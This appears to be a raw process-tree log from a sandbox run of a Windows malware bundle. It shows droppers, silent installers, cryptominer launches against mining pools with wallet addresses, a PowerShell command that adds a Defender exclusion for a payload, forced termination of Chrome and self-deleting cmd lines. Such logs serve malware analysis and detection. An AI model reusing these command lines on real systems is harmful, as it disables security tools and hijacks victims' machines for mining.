C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:7540
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:5896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"18⤵PID:8380
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:6572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"17⤵PID:8684
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g25fww2a.l5q\app.exe /8-2222 & exit15⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\g25fww2a.l5q\app.exeC:\Users\Admin\AppData\Local\Temp\g25fww2a.l5q\app.exe /8-222216⤵PID:7376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jvpwwpx.vwf\Four.exe & exit15⤵PID:8528
-
C:\Users\Admin\AppData\Local\Temp\0jvpwwpx.vwf\Four.exeC:\Users\Admin\AppData\Local\Temp\0jvpwwpx.vwf\Four.exe16⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe" 1 3.1617536869.6069a7654d10f 10418⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B8X5OVY5YE\multitimer.exe" 2 3.1617536869.6069a7654d10f19⤵PID:3664
-
C:\Users\Admin\AppData\Local\Temp\wbiqtsh5beh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\wbiqtsh5beh\cpyrix.exe" /VERYSILENT20⤵PID:5472
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:5020
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:9372
-
-
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:8352
-
C:\Users\Admin\AppData\Local\Temp\695830b9-d003-48ca-9a03-82b545a6d905\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\695830b9-d003-48ca-9a03-82b545a6d905\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\695830b9-d003-48ca-9a03-82b545a6d905\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\695830b9-d003-48ca-9a03-82b545a6d905\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\695830b9-d003-48ca-9a03-82b545a6d905\AdvancedRun.exe" /SpecialRun 4101d8 501623⤵PID:9492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:9512
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:6756
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:9640
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:8244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\axnhcnkhk50\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\axnhcnkhk50\Setup3310.exe" /Verysilent /subid=57720⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\is-MK4E5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-MK4E5.tmp\Setup3310.tmp" /SL5="$80280,138429,56832,C:\Users\Admin\AppData\Local\Temp\axnhcnkhk50\Setup3310.exe" /Verysilent /subid=57721⤵PID:8388
-
C:\Users\Admin\AppData\Local\Temp\is-4MAQ3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4MAQ3.tmp\Setup.exe" /Verysilent22⤵PID:512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0yhtgy4vypc\app.exe"C:\Users\Admin\AppData\Local\Temp\0yhtgy4vypc\app.exe" /8-2320⤵PID:1872
-
-
C:\Users\Admin\AppData\Local\Temp\b1nuxrg5khe\nfxuh4uj2j0.exe"C:\Users\Admin\AppData\Local\Temp\b1nuxrg5khe\nfxuh4uj2j0.exe" /ustwo INSTALL20⤵PID:8360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nfxuh4uj2j0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\b1nuxrg5khe\nfxuh4uj2j0.exe" & exit21⤵PID:8608
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nfxuh4uj2j0.exe" /f22⤵
- Kills process with taskkill
PID:5636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mhits1um40h\vict.exe"C:\Users\Admin\AppData\Local\Temp\mhits1um40h\vict.exe" /VERYSILENT /id=53520⤵PID:8976
-
C:\Users\Admin\AppData\Local\Temp\is-48821.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-48821.tmp\vict.tmp" /SL5="$20748,870426,780800,C:\Users\Admin\AppData\Local\Temp\mhits1um40h\vict.exe" /VERYSILENT /id=53521⤵PID:1036
-
C:\Users\Admin\AppData\Local\Temp\is-HNSLQ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-HNSLQ.tmp\win1host.exe" 53522⤵PID:9000
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\QWQF08TG6J\setups.exe"C:\Users\Admin\AppData\Local\Temp\QWQF08TG6J\setups.exe" ll17⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\is-32A3R.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-32A3R.tmp\setups.tmp" /SL5="$4069E,454998,229376,C:\Users\Admin\AppData\Local\Temp\QWQF08TG6J\setups.exe" ll18⤵PID:6524
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\is-HC8QQ.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-HC8QQ.tmp\lylal220.tmp" /SL5="$30344,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\is-4AS7U.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-4AS7U.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:6356
-
C:\Program Files\Windows Media Player\KPQTYEUYFQ\irecord.exe"C:\Program Files\Windows Media Player\KPQTYEUYFQ\irecord.exe" /VERYSILENT14⤵PID:6260
-
C:\Users\Admin\AppData\Local\Temp\is-8E5BK.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-8E5BK.tmp\irecord.tmp" /SL5="$20266,6265333,408064,C:\Program Files\Windows Media Player\KPQTYEUYFQ\irecord.exe" /VERYSILENT15⤵PID:876
-
-
-
C:\Users\Admin\AppData\Local\Temp\d9-4e20e-f4a-daeb4-d2e3da9f61cda\Cucoromani.exe"C:\Users\Admin\AppData\Local\Temp\d9-4e20e-f4a-daeb4-d2e3da9f61cda\Cucoromani.exe"14⤵PID:7152
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 220415⤵PID:7972
-
-
-
C:\Users\Admin\AppData\Local\Temp\72-7c0da-349-46897-9a4307382a15e\Mycarisipe.exe"C:\Users\Admin\AppData\Local\Temp\72-7c0da-349-46897-9a4307382a15e\Mycarisipe.exe"14⤵PID:6968
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzzusuz2.vs2\md6_6ydj.exe & exit15⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\mzzusuz2.vs2\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\mzzusuz2.vs2\md6_6ydj.exe16⤵PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vtyy4ts2.fyy\askinstall31.exe & exit15⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\vtyy4ts2.fyy\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\vtyy4ts2.fyy\askinstall31.exe16⤵PID:5712
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:7776
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:7580
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmsoxy5z.ew4\toolspab1.exe & exit15⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\jmsoxy5z.ew4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\jmsoxy5z.ew4\toolspab1.exe16⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\jmsoxy5z.ew4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\jmsoxy5z.ew4\toolspab1.exe17⤵PID:7592
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0okmsmnx.mu4\GcleanerWW.exe /mixone & exit15⤵PID:5248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mt3jgjlg.cs5\setup_10.2_mix.exe & exit15⤵PID:8276
-
C:\Users\Admin\AppData\Local\Temp\mt3jgjlg.cs5\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\mt3jgjlg.cs5\setup_10.2_mix.exe16⤵PID:9128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w1gv40wf.3i5\file.exe & exit15⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\w1gv40wf.3i5\file.exeC:\Users\Admin\AppData\Local\Temp\w1gv40wf.3i5\file.exe16⤵PID:9064
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:8776
-
C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe" 1 3.1617536879.6069a76f9e21b 10119⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IRR02LERR6\multitimer.exe" 2 3.1617536879.6069a76f9e21b20⤵PID:6432
-
C:\Users\Admin\AppData\Local\Temp\o33dy3ykpkc\vict.exe"C:\Users\Admin\AppData\Local\Temp\o33dy3ykpkc\vict.exe" /VERYSILENT /id=53521⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\is-P0MO7.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-P0MO7.tmp\vict.tmp" /SL5="$4062C,870426,780800,C:\Users\Admin\AppData\Local\Temp\o33dy3ykpkc\vict.exe" /VERYSILENT /id=53522⤵PID:8864
-
C:\Users\Admin\AppData\Local\Temp\is-AG4LQ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-AG4LQ.tmp\win1host.exe" 53523⤵PID:8852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0tlx0w0kz23\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\0tlx0w0kz23\cpyrix.exe" /VERYSILENT21⤵PID:8420
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:9612
-
C:\Users\Admin\AppData\Local\Temp\d644e5a3-e15a-4154-9b2b-8f8832f0dc6e\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d644e5a3-e15a-4154-9b2b-8f8832f0dc6e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d644e5a3-e15a-4154-9b2b-8f8832f0dc6e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:9400
-
C:\Users\Admin\AppData\Local\Temp\d644e5a3-e15a-4154-9b2b-8f8832f0dc6e\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d644e5a3-e15a-4154-9b2b-8f8832f0dc6e\AdvancedRun.exe" /SpecialRun 4101d8 940024⤵PID:9912
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:9340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:9540
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:3920
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵
- Checks computer location settings
- Modifies registry class
PID:4244
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:10100
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:10120
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:10108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\egfbv1ijvng\10wikomqxsx.exe"C:\Users\Admin\AppData\Local\Temp\egfbv1ijvng\10wikomqxsx.exe" /ustwo INSTALL21⤵PID:5360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "10wikomqxsx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\egfbv1ijvng\10wikomqxsx.exe" & exit22⤵PID:9452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "10wikomqxsx.exe" /f23⤵
- Kills process with taskkill
PID:9176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\x2hjhbtjhin\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\x2hjhbtjhin\Setup3310.exe" /Verysilent /subid=57721⤵PID:8496
-
C:\Users\Admin\AppData\Local\Temp\is-NERS7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NERS7.tmp\Setup3310.tmp" /SL5="$3064C,138429,56832,C:\Users\Admin\AppData\Local\Temp\x2hjhbtjhin\Setup3310.exe" /Verysilent /subid=57722⤵PID:8800
-
C:\Users\Admin\AppData\Local\Temp\is-RD0DN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RD0DN.tmp\Setup.exe" /Verysilent23⤵PID:5456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5cqwmtqrsfe\app.exe"C:\Users\Admin\AppData\Local\Temp\5cqwmtqrsfe\app.exe" /8-2321⤵PID:4908
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EQVHZQDVFU\setups.exe"C:\Users\Admin\AppData\Local\Temp\EQVHZQDVFU\setups.exe" ll18⤵PID:6452
-
C:\Users\Admin\AppData\Local\Temp\is-RG5BB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RG5BB.tmp\setups.tmp" /SL5="$207CA,454998,229376,C:\Users\Admin\AppData\Local\Temp\EQVHZQDVFU\setups.exe" ll19⤵PID:8536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:3376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:6024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:5888
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:4344
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:4888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:1596
-
C:\Users\Admin\AppData\Roaming\AD16.tmp.exe"C:\Users\Admin\AppData\Roaming\AD16.tmp.exe"18⤵PID:3904
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:196
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Roaming\DD5E.tmp.exe"C:\Users\Admin\AppData\Roaming\DD5E.tmp.exe"18⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DD5E.tmp.exe19⤵PID:8416
-
C:\Windows\SysWOW64\timeout.exetimeout /t 320⤵
- Delays execution with timeout.exe
PID:3092
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:8776
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:1056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:7532
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\biy0xz2m.sar\app.exe /8-2222 & exit15⤵PID:8756
-
C:\Users\Admin\AppData\Local\Temp\biy0xz2m.sar\app.exeC:\Users\Admin\AppData\Local\Temp\biy0xz2m.sar\app.exe /8-222216⤵PID:8624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l35w2ukf.gag\Four.exe & exit15⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\l35w2ukf.gag\Four.exeC:\Users\Admin\AppData\Local\Temp\l35w2ukf.gag\Four.exe16⤵PID:64
-
C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:8616
-
C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe" 1 3.1617536959.6069a7bf6f357 10418⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XKT65CLITF\multitimer.exe" 2 3.1617536959.6069a7bf6f35719⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\s1tmorhu45r\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\s1tmorhu45r\cpyrix.exe" /VERYSILENT20⤵PID:9440
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:9908
-
C:\Users\Admin\AppData\Local\Temp\5238c4a6-620b-425a-9114-a3e8b1a39eaa\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5238c4a6-620b-425a-9114-a3e8b1a39eaa\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5238c4a6-620b-425a-9114-a3e8b1a39eaa\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\5238c4a6-620b-425a-9114-a3e8b1a39eaa\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5238c4a6-620b-425a-9114-a3e8b1a39eaa\AdvancedRun.exe" /SpecialRun 4101d8 542023⤵PID:2844
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:9424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:5048
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:10164
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:196
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:1352
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:7136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wzkr0bf3bgf\jchs4neiblx.exe"C:\Users\Admin\AppData\Local\Temp\wzkr0bf3bgf\jchs4neiblx.exe" /ustwo INSTALL20⤵PID:6072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "jchs4neiblx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wzkr0bf3bgf\jchs4neiblx.exe" & exit21⤵PID:9356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "jchs4neiblx.exe" /f22⤵
- Kills process with taskkill
PID:4308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a0esrlwzdlo\vict.exe"C:\Users\Admin\AppData\Local\Temp\a0esrlwzdlo\vict.exe" /VERYSILENT /id=53520⤵PID:9432
-
C:\Users\Admin\AppData\Local\Temp\is-9BJJP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-9BJJP.tmp\vict.tmp" /SL5="$B0696,870426,780800,C:\Users\Admin\AppData\Local\Temp\a0esrlwzdlo\vict.exe" /VERYSILENT /id=53521⤵PID:3284
-
C:\Users\Admin\AppData\Local\Temp\is-UMRJ8.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-UMRJ8.tmp\win1host.exe" 53522⤵PID:1796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jrxbptzmjjf\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jrxbptzmjjf\Setup3310.exe" /Verysilent /subid=57720⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\is-9EMJG.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-9EMJG.tmp\Setup3310.tmp" /SL5="$905B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\jrxbptzmjjf\Setup3310.exe" /Verysilent /subid=57721⤵PID:9604
-
C:\Users\Admin\AppData\Local\Temp\is-HAKU4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HAKU4.tmp\Setup.exe" /Verysilent22⤵PID:6456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5a5f4dcozkh\app.exe"C:\Users\Admin\AppData\Local\Temp\5a5f4dcozkh\app.exe" /8-2320⤵PID:9660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\NT2SFW91WY\setups.exe"C:\Users\Admin\AppData\Local\Temp\NT2SFW91WY\setups.exe" ll17⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\is-1DO9L.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1DO9L.tmp\setups.tmp" /SL5="$702BE,454998,229376,C:\Users\Admin\AppData\Local\Temp\NT2SFW91WY\setups.exe" ll18⤵PID:5488
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:2232
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:7124
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:6700
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:4704
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6156
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6692
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5252
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵PID:1776
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:1532
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe" 1 3.1617536622.6069a66e8142b 10313⤵PID:68
-
C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GQCAG7OCN\multitimer.exe" 2 3.1617536622.6069a66e8142b14⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\vcnkg55oswc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vcnkg55oswc\Setup3310.exe" /Verysilent /subid=57715⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\is-SCHUL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SCHUL.tmp\Setup3310.tmp" /SL5="$503DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\vcnkg55oswc\Setup3310.exe" /Verysilent /subid=57716⤵PID:604
-
C:\Users\Admin\AppData\Local\Temp\is-C1RB1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-C1RB1.tmp\Setup.exe" /Verysilent17⤵PID:7936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ojiphuobct\app.exe"C:\Users\Admin\AppData\Local\Temp\4ojiphuobct\app.exe" /8-2315⤵PID:4616
-
-
C:\Users\Admin\AppData\Local\Temp\uo4ymu0zow3\fher1bdbssg.exe"C:\Users\Admin\AppData\Local\Temp\uo4ymu0zow3\fher1bdbssg.exe" /ustwo INSTALL15⤵PID:6392
-
